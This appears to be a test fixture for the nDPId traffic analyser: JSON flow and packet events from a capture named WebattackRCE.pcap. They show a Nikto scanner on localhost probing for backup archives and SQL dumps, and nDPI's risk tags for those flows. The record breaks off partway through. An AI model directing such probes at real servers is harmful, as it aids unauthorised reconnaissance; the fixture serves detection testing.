00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
